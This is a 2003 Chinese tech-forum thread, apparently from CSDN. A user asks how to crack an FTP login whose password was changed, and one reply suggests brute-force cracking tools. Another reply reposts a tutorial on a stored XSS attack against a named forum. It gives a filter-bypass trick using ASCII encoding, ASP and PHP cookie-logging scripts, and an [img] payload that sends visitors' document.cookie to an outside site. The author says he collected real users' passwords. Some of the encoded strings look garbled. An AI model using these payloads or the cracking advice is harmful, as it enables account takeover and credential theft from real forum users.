很简单的问题,只要你解决了我的问题,分就全给你!

tianxueer 2003-08-21 11:58:14
我用GuteFtp上传网页.以前正常.可用户名密码被人改了.现在登陆时弹出让重新输入用户名和密码的对话框,请问有什么办法或软件破解吗??? 先谢过了!
...全文
39 6 打赏 收藏 转发到动态 举报
写回复
用AI写文章
6 条回复
切换为时间正序
请发表友善的回复…
发表回复
reddante 2003-08-26
  • 打赏
  • 举报
回复
问管理员
reddante 2003-08-21
  • 打赏
  • 举报
回复
to wina(笨笨鸟) :你干什么呀,人家说是ftp密码掉了.你这是什么呀!发错地方了吧!
2年前的技术,2年前的事情.你怎么...
infofox 2003-08-21
  • 打赏
  • 举报
回复
你可以使用FTP破解工具暴力破解

wina 2003-08-21
  • 打赏
  • 举报
回复
有个站点的整站程序很好,很漂亮,我也下了一个,但是在测试中出现了问题,就是UBB捣的鬼了,我们来看他的UBB过滤代码段:
<%
Function code_ssstrers)
dim strer:strer=strers
if strer="" or isnull(strer) then code_ss"":exit function
strer=replace(strer,"<","<")
strer=replace(strer,">",">")
strer=replace(strer," "," ") 空格
strer=replace(strer,CHR(9)," ") table
strer=replace(strer,"","") 单引号
strer=replace(strer,"""",""") 双引号
dim re,re_v
re_v="[^\(\)\;\;""\[]*"
re_v=".[^\[]*"
Set re=new RegExp
re.IgnoreCase =True
re.Global=True
re.Pattern="(javascript:)"
strer=re.Replace(strer,"javascript:")
re.Pattern="(javascript)"
strer=re.Replace(strer,"javascript")
re.Pattern="(jscript:)"
strer=re.Replace(strer,"jscript :")
re.Pattern="(js:)"
strer=re.Replace(strer,"js:")
re.Pattern="(value)"
strer=re.Replace(strer,"value")
re.Pattern="(about:)"
strer=re.Replace(strer,"about:")
re.Pattern="(file:)"
strer=re.Replace(strer,"file&:")
re.Pattern="(document.)"
strer=re.Replace(strer,"document :")
re.Pattern="(vbscript:)"
strer=re.Replace(strer,"vbscript :")
re.Pattern="(vbs:)"
strer=re.Replace(strer,"vbs :")
re.Pattern="(on(mouse|exit|error|click|key))"
strer=re.Replace(strer,"on$2")

懂ASP的朋友就可以看出,以上代码段对javascript,jscript:,js:,about;value,document.,onmouse以及onexit等语句进行了过滤和替换,并对一些特殊字符进行了替换,比如".",";""(",")",但是我们仔细观察代码后我们发现他的过滤机制还是不完整的,我们可以提交[ img]°]vasOripj& #57documensLwrite #30这样就又被修改了,这样我们就可以用类似代码来实现更高级的脚本攻击。

四:实践阶段
好了,理论讲完了,实践吧。。。。。。。

因为今天我们要获取cookie信息,所以首先是写获取cookie的文件,我的空间是asp的,所以就写asp文件,下面的代码不是我写的了。。。。。。
以下是获取cookie的asp源代码:
<%
testfile=Server.MapPath("longker.txt")
msg=Request("msg")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg& "")
thisfile.close
set fs = nothing
%>
怎么样,很简单是不是,上面的文件是把得到的信息存为longker.txt,如果漏洞存在,就会在空间里生成
longker.txt,里边是收集的cookie信息。

好了,一切就绪了,开始测试吧。我首先输了这样的内容:
[ img]javascript:document.write(不知道有没有);[ /img]
被过滤了,看图1:


成了星号和一个鬼脸了,这个自然会过滤的了,我也早想到了,为了让大家能看的更清楚,所以在这里也测试下。
这样不行,我们的获取cookie的脚本还没有插进去呢。换种方法来吧,看来论坛对字符过滤得比较严格,
把字母j换成ascii码试试,j的ascii码是106。看图2:



看javascript出来了吧?如果我们发个帖子,并且禁止表情字符的话,那大家在浏览的时候就会出现一个警告框,上面也着“再试”,看图三我测试的结果:


成功了,但是这样只是给了个警告而已,没有获取cookie信息,那大家是不是知道下面该怎么办了?好了,下面我们来把获取cookie的asp文件插入进去吧,为了防止论坛还过滤了一些字符,我们把所有的内容全用ascii码来代替。






在浏览器的上方看见什么了?呵呵,时间,id和密码等信息哦,这样只要你访问这个页面并且你已经登陆的话,你的cookie信息就全在里面了,是不是很恐怖呢?如果你的论坛密码和QQ邮箱的密码是一样的,那你就惨了,所以在进论坛的时候还是存在在安全隐患的。这也是我写这个文章的原因了。
弹出个窗口肯定让人怀疑的,那怎么不让它弹出窗口呢?我提交的代码是:
[ img]javascript:document.location=http://www.longker.com/ywzy/info.asp?msg=+document.cookie[ /img]
转换成ascii码就是:
[ img]javascript:location=http://www.longker.com/ywzy/info.asp?msg=+document.cookie[ /img]
换成这个代码后就不会出现新窗口了 :) 去看看我的网站上保存的那个记录cookie的文件,已经很大了。看图六:


看到了吧,密码全在你眼前哦,而且是明文的。为此我还被批判了,搞不懂。。。。。。。。。。。。。。。。
五:思考及解决办法
值得注意的是,经过对国内的几个流行的留言板和论坛的测试。基本上所有的免费留言板程序都有问题。
主要还是因为过滤机制不严密造成的,象一些ubb语句,那么样经过严格的过滤,这样就很容易被人家利用,对广大网民造成危害,影响你站点的声誉。
下面是如何防范的问题了,如何防范XSS跨站攻击?
首先是作为浏览者或者是有留言板的你:
在你的WEB浏览器上禁用javascript脚本,具体方法,先打开你的IE的internet选项,切换到“安全”页,有个“自定义”级别,点他出现如下窗口,见图七:


禁用就可以了。但是好象不太可能,因为一旦禁用,很多功能就丧失了,这个方法是下策。
还有不要访问包含<script>字符的连接,当然一些官方的URL不会包括任何脚本元素。
如果你的站点程序含论坛,留言板,以及其他程序中含提交数据格式的,没有很好过滤机制,请马上下载升级程序或是停止使用ubb这样的功能,避免造成更多的问题。
再者是作为程序的开发这而言:
开发者要仔细审核代码,对提交输入数据进行有效检查,如空格,ascii码等,这个是上策。但是由于XSS漏洞可被利用的多样性,程序员自己要明白具体需要过滤的字符,这主要依赖于所开发程序的作用,建议过滤掉所有元字符。
最后,希望广大网络爱好者看了这个文章后能增加安全意识,把好自己网站的关。切忌利用此教程进行破坏行为,谢谢!

另附:
php空间获取cookie的代码文件:
<?php
$info = getenv("QUERY_STRING");
if ($info) {
$fp = fopen("longker.txt","a");
fwrite($fp,$info."\n");
fclose($fp);
}
?>

wina 2003-08-21
  • 打赏
  • 举报
回复
转帖:
我是如何获取小榕论坛的用户密码的


小榕的流光5推迟发布,网站也一直打不开。前几天去已经能访问了,我的监狱生涯好象也结束了,双喜临门啊。我在小榕论坛被关了3次,不说了。我是捣蛋鬼了。。。。。。。。。。。。。
可以发帖了,看见论坛有人在测试脚本漏洞,我也想测试测试,没有想到的是成功了,所以写了这个文章给大家,让大家在处理脚本的时候多留心着点。
.跨站脚本攻击虽然很少会对服务器造成一些什么比较大的影响,但对于一个站点来说,存在这种漏洞实在是太不值得!小则,弹点什么东东出来;重则窃取用户的COOKIES资料。更甚者将会G掉浏览者的硬盘.一个站点被变成一个恶意网站,还有谁敢来?如果再加上该站的站长比较"盲"一些,岂不乱套了?

首先应该让大家知道什么是跨站脚本(很多是copy的,当然有个人的理解,呵呵)

一:什么是跨站脚本(CSS/XSS)?

我们所说跨站脚本是指在远程WEB页面的html代码中插入的具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行,今天我就把带有能获取cookie信息的
脚本嵌入了所发帖子的页面里,并且成功地绕过了论坛对特殊字符的限制,具体怎么做,大家等下可以看下面的。而有时候跨站脚本被称为"XSS",这是因为"CSS"一般被称为分层样式表,搞网站设计的都知道CSS,因为它的功能很强大。或许这很容易让人困惑,但是如果你听某人提到CSS或者XSS安全漏洞,通常指得是跨站脚本。

二:XSS和脚本注射的区别?

但是并非任何可利用脚本插入实现攻击的漏洞都被称为XSS,因为还有另一种攻击方式:"Script Injection",
即脚本注入或者是讲脚本注射,他们之间是有区别的:
他们的区别在以下两点:
1.(Script Injection)脚本插入攻击会把我们插入的脚本保存在被修改的远程WEB页面里,如
:sql injection,XPath injection.这个很常见,好象前几个月很多安全网站被黑就是因为脚本里存在注入漏洞,而被一些人利用的。
2.跨站脚本是临时的,执行后就消失了。这个就不同于我们现在讨论的XSS/CSS 了,今天讲的是在页面中插入脚本,这样谁来访问谁的浏览器就执行,如果不被删掉或者是修改编辑的话,就一直存在的。

那么什么类型的脚本可以被插入远程页面?

主流脚本包括以下几种:
HTML
JavaScript (这个是我今天测试的
VBScript
ActiveX
Flash

好了,进入正题,具体如何检查这个漏洞,大家可以看绿盟Sn0wing翻译的文章《跨站脚本说明》。
三:基本理论
首先,讲一下最简单的脚本攻击:<td ></td >(TD TR在网页中是代表框架的)等HTML字符的过滤问题。
先找了个CGI的论坛,以原来ASP的眼光看CGI的站点,我们先注册用户,在用户一栏中填写<td >,提交用户注册后发现并没提出非法字符的提示,惨了,看来是有BUG了。注册完成后,点击资料也发现页面变形了.如在其他几个如国家,性别里填写也会出现同样的问题,那页面就没法看了。于是换了一个站点,再次提交<td >出现了非法字符提示(比如小榕的),看来站点是已经过滤的<>等HTML的脚本字符,那好,我们改用ASCII 码替换<> 如& #60; & #62;代替提交后再来看,又出现了上面页面变形的情况(小榕的当然没有了),看来非法过滤机制还不是很完善。
简单的脚本攻击如<td >等HTML格式的代码一定要过滤好,.那我们下面就开始重点讲一下UBB过滤漏洞的问题。因为UBB在现在很多的论坛和免费留言本里都有使用的,所以需要重点讲下。因为我自己原来的留言本也是这样的,被测试过发现也有这样的漏洞,现在就换了个安全点的。
UBB是论坛中用来替换HTML编辑的一种格式符号,如[ b][ /b]可以替换成HTML中的< b>< / b>,然而就是这一个替换问题,就成了跨站脚本攻击的最佳选择对象。
先讲些我们常用的标签,比如img标签,[ img]的过滤,确实很麻烦而且是个老大难问题,关于这个标签的脚本攻击很流行,网上也有很多文章。但是很多站点还是存在这个漏洞,有些根本没有进行过滤,特别是一些免费留言板的提供站点。下面我们主要讲一下高级问题: 由于[ img]的初级问题骚扰,很多站点就对一个敏感的字符开始过滤。比如字段ja,字段doc,已经字段wr等,或者是对字符进行过滤。比如java,document等等。这样一来,似乎这样的攻击少了很多,使跨站攻击变的神秘并且深奥了,但是我们仍然可以利用ASCII码来代替。看个实例吧:
alexdyong 2003-08-21
  • 打赏
  • 举报
回复
这样的问题不简单哦!上传到哪里?是本机的用户ID还是远端的ID号?为什么你不重新申请一个呢》?

9,506

社区成员

发帖
与我相关
我的任务
社区描述
Windows专区 安全技术/病毒
社区管理员
  • 安全技术/病毒社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧